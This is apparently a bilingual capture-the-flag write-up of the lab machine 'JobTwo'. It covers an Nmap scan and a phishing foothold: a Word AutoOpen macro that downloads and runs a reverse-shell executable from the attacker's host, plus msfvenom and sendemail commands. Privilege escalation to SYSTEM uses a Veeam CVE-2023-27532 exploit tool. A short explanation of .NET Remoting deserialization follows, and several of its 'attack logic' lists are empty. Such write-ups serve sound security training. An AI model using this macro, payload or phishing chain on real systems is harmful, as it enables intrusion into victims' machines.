本文介绍了一个关于“JobTwo”的渗透测试过程,首先进行了信息收集,使用Nmap扫描发现开放的端口及其服务。随后,通过创建Word文档并利用VBS宏实现反向Shell,成功获取了用户权限。接着,通过识别安装的Veeam备份与恢复软件,利用CVE-2023-27532漏洞进行特权提升,最终获得了系统权限。文章还深入探讨了.NET Remoting的基本背景及其潜在的安全风险,强调了内部网络安全防护的重要性。 This article details a penetration testing process for "JobTwo". It begins with information gathering, using an Nmap scan to identify open ports and their associated services. Subsequently, by creating a Word document and leveraging a VBS macro to achieve a reverse shell, user privileges were obtained. Next, by identifying the installed Veeam Backup & Replication software, the CVE-2023-27532 vulnerability was exploited for privilege escalation, ultimately gaining system privileges. The article also delves into the fundamental background of .NET Remoting and its potential security risks, emphasizing the importance of internal network security protection.

Information Gathering

# Nmap 7.98 scan initiated Sun Jan  4 14:03:38 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.129.238.35
Nmap scan report for 10.129.238.35
Host is up (0.17s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT      STATE SERVICE              VERSION
22/tcp    open  ssh                  OpenSSH for_Windows_9.5 (protocol 2.0)
25/tcp    open  smtp                 hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
111/tcp   open  rpcbind
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
443/tcp   open  ssl/https?
| tls-alpn:
|   h2
|_  http/1.1
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Issuer: commonName=www.job2.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-09T13:31:40
| Not valid after:  2122-05-09T13:41:37
| MD5:     c9f2 9528 e037 427f 18a4 25df 8a09 9bcb
| SHA-1:   a8ea cfdd 9e76 ba15 d11e 9b86 90b3 91c0 a6d8 6084
|_SHA-256: db18 1035 4d3e bc36 30f4 bf54 0f97 e545 b58c de74 e66a 54f8 fefc 425b b1dc 4afb
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
1063/tcp  open  rpcbind
2049/tcp  open  rpcbind
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=JOB2
| Issuer: commonName=JOB2
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-26T11:44:40
| Not valid after:  2026-04-27T11:44:40
| MD5:     bf8d 2c65 9d12 408e 3c34 855e 2d4c c869
| SHA-1:   8c1b 5175 aa80 1ba5 730d 4ba2 71a6 62a5 c31a b834
|_SHA-256: 3e3c 7325 baeb 35f9 1501 ab98 6577 a9f9 299c ab16 5bc2 97b8 0c9d c27e fa0b 9a9a
|_ssl-date: 2026-01-04T15:06:32+00:00; +1h00m00s from scanner time.
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
10001/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10002/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10003/tcp open  storagecraft-image   StorageCraft Image Manager
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.081 days (since Sun Jan  4 12:09:36 2026)
TCP Sequence Prediction: Difficulty=249 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2026-01-04T15:05:52
|_  start_date: N/A
|_clock-skew: mean: 59m59s, deviation: 0s, median: 59m59s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan  4 14:06:39 2026 -- 1 IP address (1 host up) scanned in 180.97 seconds

Vulnerability Analysis

进入https://www.job2.vl/,可以看到

"If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document."

Exploitation (User Flag)

创建一个docm的word文件

alt+F11,输入VBS宏

Sub AutoOpen()

  a = Shell("""curl"" ""10.10.16.21/shell.exe"" ""-o"" ""C:\Windows\tasks\shell.exe""", vbHide)
  b = Shell("C:\Windows\tasks\shell.exe", vbHide)

End Sub
# 要发两次,第一次下载第二次执行

本地创建rcat.exe反向shell文件

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.21 LPORT=443 -f exe -o shell.exe

发送邮件

sendemail -s job2.vl -f "Neobee@gmail.htb" -t hr@job2.vl -m "hey pls check my cv http://10.10.16.21/" -a 1.docm -o tls=no

即可得到job2\julian的shell

Privilege Escalation (Root Flag)

net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand
Guest                    Julian                   svc_veeam
WDAGUtilityAccount
The command completed with one or more errors.

得到svc_veeam,可知目标安装着Veeam Backup & Replication 软件

检查是否运行着veeam

tasklist /svc | findstr /i "veeam"
tasklist /svc | findstr /i "veeam"
sqlservr.exe                  2464 MSSQL$VEEAMSQL2016
sqlceip.exe                   2764 SQLTELEMETRY$VEEAMSQL2016
Veeam.Backup.Agent.Config     3472 VeeamDistributionSvc
VeeamFilesysVssSvc.exe        3480 VeeamFilesysVssSvc
VeeamDeploymentSvc.exe        3496 VeeamDeploySvc
VeeamTransportSvc.exe         3504 VeeamTransportSvc
VeeamNFSSvc.exe               3512 VeeamNFSSvc
Veeam.Guest.Interaction.P     4008 N/A
Veeam.Backup.Service.exe      3120 VeeamBackupSvc
Veeam.Backup.BrokerServic     6392 VeeamBrokerSvc
Veeam.Backup.ExternalInfr      944 N/A
Veeam.Backup.Manager.exe      3928 N/A
Veeam.Backup.WmiServer.ex     8692 N/A
Veeam.Backup.CatalogDataS     9144 VeeamCatalogSvc
Veeam.Backup.CloudService     7368 VeeamCloudSvc
Veeam.Backup.UIServer.exe     8392 N/A
Veeam.Backup.MountService     7256 VeeamMountSvc

因为可以访问本地的网络,所以可以尝试CVE-2023-27532

上传四个文件

07/10/2024  11:34 AM         1,841,232 Veeam.Backup.Common.dll
07/10/2024  11:34 AM           430,160 Veeam.Backup.Interaction.MountService.dll
07/10/2024  11:34 AM         4,444,240 Veeam.Backup.Model.dll
07/10/2024  11:34 AM             7,168 VeeamHax.exe

运行

C:\Users\Julian\Documents>.\VeeamHax.exe --target 127.0.0.1 --cmd C:\Windows\tasks\shell.exe
.\VeeamHax.exe --target 127.0.0.1 --cmd C:\Windows\tasks\shell.exe
Targeting 127.0.0.1:9401

即可获得shell

C:\WINDOWS\system32>whoami
whoami
nt authority\system

Lessons Learned

被遗忘的 .NET Remoting

1. 核心背景:被遗忘的 .NET Remoting

要理解这个漏洞,首先要理解 .NET Remoting

  • 这是什么? 这是一个微软在 .NET Framework 早期(2002年左右)推出的技术,允许不同进程(Process)或不同机器上的程序对象进行通信。你可以把它想象成“远程过程调用 (RPC)”的一种老式实现。
  • 为什么危险? 微软多年前就已弃用该技术,并建议改用 WCF 或 REST API。原因在于 .NET Remoting 极其依赖 反序列化 (Deserialization),且默认配置往往缺乏严格的安全边界。

Veeam 的失误: Veeam Backup & Replication (VBR) 的核心服务(Veeam.Backup.Service.exe)为了方便各个组件(如 UI 控制台、挂载服务等)互相通讯,在 TCP 端口 9392 上开启了一个 .NET Remoting 监听器。

2. 漏洞成因:未认证的 API 暴露

CVE-2023-27532 本质上是一个 认证绕过 (Authentication Bypass) 漏洞,它分为两个主要利用方向:

A. 凭据窃取 (Credential Dumping) - 逻辑漏洞

这是最常见的利用方式。

  1. 正常流程:管理员通过控制台登录,Veeam 服务验证身份后,允许管理员查询数据库配置。
  2. 漏洞点:Veeam 在 9392 端口暴露了一个名为 IVeeamService(或类似的内部接口)的端点。开发者错误地认为只有经过身份验证的内部组件才会连接这个端口,因此没有对某些特定的 API 调用进行身份检查。
  3. 攻击逻辑

B. 远程代码执行 (RCE) - 反序列化漏洞

这是你刚才使用的利用方式(通过 9401 端口拿到 Shell)。

  1. 原理:.NET Remoting 通信依赖于 BinaryFormatter。当服务器接收到客户端发来的数据对象时,它会自动进行“反序列化”(把二进制数据还原成内存中的对象)。
  2. 危险的 BinaryFormatter:微软明确警告过 BinaryFormatter 是不安全的。如果攻击者发送一个恶意的、特制的序列化对象,服务器在还原这个对象的过程中,会触发对象内部定义的恶意代码。
  3. 攻击逻辑

3. 为什么你在 Localhost 攻击成功?

这涉及到网络架构的安全边界。

  • 外部防御:在真实的企业环境中,管理员通常会在防火墙上封禁 9392/9401 端口,导致外部攻击者无法直接利用。
  • 内部防御缺失:但是,软件通常默认信任 Localhost (127.0.0.1)
  • 攻击路径

 

Information Gathering

# Nmap 7.98 scan initiated Sun Jan  4 14:03:38 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.129.238.35
Nmap scan report for 10.129.238.35
Host is up (0.17s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT      STATE SERVICE              VERSION
22/tcp    open  ssh                  OpenSSH for_Windows_9.5 (protocol 2.0)
25/tcp    open  smtp                 hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
111/tcp   open  rpcbind
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
443/tcp   open  ssl/https?
| tls-alpn:
|   h2
|_  http/1.1
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Issuer: commonName=www.job2.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-09T13:31:40
| Not valid after:  2122-05-09T13:41:37
| MD5:     c9f2 9528 e037 427f 18a4 25df 8a09 9bcb
| SHA-1:   a8ea cfdd 9e76 ba15 d11e 9b86 90b3 91c0 a6d8 6084
|_SHA-256: db18 1035 4d3e bc36 30f4 bf54 0f97 e545 b58c de74 e66a 54f8 fefc 425b b1dc 4afb
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
1063/tcp  open  rpcbind
2049/tcp  open  rpcbind
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=JOB2
| Issuer: commonName=JOB2
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-26T11:44:40
| Not valid after:  2026-04-27T11:44:40
| MD5:     bf8d 2c65 9d12 408e 3c34 855e 2d4c c869
| SHA-1:   8c1b 5175 aa80 1ba5 730d 4ba2 71a6 62a5 c31a b834
|_SHA-256: 3e3c 7325 baeb 35f9 1501 ab98 6577 a9f9 299c ab16 5bc2 97b8 0c9d c27e fa0b 9a9a
|_ssl-date: 2026-01-04T15:06:32+00:00; +1h00m00s from scanner time.
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
10001/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10002/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10003/tcp open  storagecraft-image   StorageCraft Image Manager
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.081 days (since Sun Jan  4 12:09:36 2026)
TCP Sequence Prediction: Difficulty=249 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2026-01-04T15:05:52
|_  start_date: N/A
|_clock-skew: mean: 59m59s, deviation: 0s, median: 59m59s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan  4 14:06:39 2026 -- 1 IP address (1 host up) scanned in 180.97 seconds

Vulnerability Analysis

Accessing https://www.job2.vl/, we can see

"If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document."

Exploitation (User Flag)

Create a .docm Word file

Press alt+F11 and input the VBS macro

Sub AutoOpen()

  a = Shell("""curl"" ""10.10.16.21/shell.exe"" ""-o"" ""C:\Windows\tasks\shell.exe""", vbHide)
  b = Shell("C:\Windows\tasks\shell.exe", vbHide)

End Sub
# Need to send twice: first to download, second to execute

Locally create the rcat.exe reverse shell file

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.21 LPORT=443 -f exe -o shell.exe

Send the email

sendemail -s job2.vl -f "Neobee@gmail.htb" -t hr@job2.vl -m "hey pls check my cv http://10.10.16.21/" -a 1.docm -o tls=no

Then obtain a shell as job2\julian

Privilege Escalation (Root Flag)

net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand
Guest                    Julian                   svc_veeam
WDAGUtilityAccount
The command completed with one or more errors.

Obtained svc_veeam, indicating the target has Veeam Backup & Replication software installed.

Check if Veeam is running

tasklist /svc | findstr /i "veeam"
tasklist /svc | findstr /i "veeam"
sqlservr.exe                  2464 MSSQL$VEEAMSQL2016
sqlceip.exe                   2764 SQLTELEMETRY$VEEAMSQL2016
Veeam.Backup.Agent.Config     3472 VeeamDistributionSvc
VeeamFilesysVssSvc.exe        3480 VeeamFilesysVssSvc
VeeamDeploymentSvc.exe        3496 VeeamDeploySvc
VeeamTransportSvc.exe         3504 VeeamTransportSvc
VeeamNFSSvc.exe               3512 VeeamNFSSvc
Veeam.Guest.Interaction.P     4008 N/A
Veeam.Backup.Service.exe      3120 VeeamBackupSvc
Veeam.Backup.BrokerServic     6392 VeeamBrokerSvc
Veeam.Backup.ExternalInfr      944 N/A
Veeam.Backup.Manager.exe      3928 N/A
Veeam.Backup.WmiServer.ex     8692 N/A
Veeam.Backup.CatalogDataS     9144 VeeamCatalogSvc
Veeam.Backup.CloudService     7368 VeeamCloudSvc
Veeam.Backup.UIServer.exe     8392 N/A
Veeam.Backup.MountService     7256 VeeamMountSvc

Since local network access is available, we can attempt CVE-2023-27532

Upload the four files

07/10/2024  11:34 AM         1,841,232 Veeam.Backup.Common.dll
07/10/2024  11:34 AM           430,160 Veeam.Backup.Interaction.MountService.dll
07/10/2024  11:34 AM         4,444,240 Veeam.Backup.Model.dll
07/10/2024  11:34 AM             7,168 VeeamHax.exe

Run it

C:\Users\Julian\Documents>.\VeeamHax.exe --target 127.0.0.1 --cmd C:\Windows\tasks\shell.exe
.\VeeamHax.exe --target 127.0.0.1 --cmd C:\Windows\tasks\shell.exe
Targeting 127.0.0.1:9401

Then obtain a shell

C:\WINDOWS\system32>whoami
whoami
nt authority\system

Lessons Learned

The Forgotten .NET Remoting

1. Core Background: The Forgotten .NET Remoting

To understand this vulnerability, one must first understand .NET Remoting.

  • What is this? This is a technology introduced by Microsoft in the early days of .NET Framework (around 2002) that allows communication between program objects in different processes or on different machines. You can think of it as an older implementation of 'Remote Procedure Call (RPC)'.
  • Why is it dangerous? Microsoft deprecated this technology years ago and recommends using WCF or REST APIs instead. The reason is that .NET Remoting heavily relies on deserialization and default configurations often lack strict security boundaries.

Veeam's mistake: Veeam Backup & Replication (VBR) core service (Veeam.Backup.Service.exe) opens a .NET Remoting listener on TCP port 9392 to facilitate communication between components (such as UI console, mount service, etc.).

2. Vulnerability Cause: Unauthenticated API Exposure

CVE-2023-27532 is essentially an authentication bypass vulnerability, which has two primary exploitation vectors:

A. Credential Dumping - Logical Vulnerability

This is the most common exploitation method.

  1. Normal process: The administrator logs in via the console. After Veeam service verifies the identity, it allows the administrator to query database configurations.
  2. Vulnerability point: Veeam exposes an endpoint named IVeeamService (or a similar internal interface) on port 9392. Developers incorrectly assumed that only authenticated internal components would connect to this port, so they did not perform identity checks on certain specific API calls.
  3. Attack logic:

B. Remote Code Execution (RCE) - Deserialization Vulnerability

This is the exploitation method you used earlier (gaining a shell via port 9401).

  1. Principle: .NET Remoting communication relies on BinaryFormatter. When the server receives a data object from a client, it automatically performs "deserialization" (reconstructing the binary data into an object in memory).
  2. Dangerous BinaryFormatter: Microsoft has explicitly warned that BinaryFormatter is insecure. If an attacker sends a malicious, specially crafted serialized object, the server will trigger malicious code defined within the object during the reconstruction process.
  3. Attack logic:

3. Why Did Your Attack Succeed on Localhost?

This involves the security boundaries of network architecture.

  • External defense: In real enterprise environments, administrators typically block ports 9392/9401 on the firewall, preventing direct exploitation by external attackers.
  • Missing internal defense: However, software typically trusts Localhost (127.0.0.1) by default.
  • Attack path: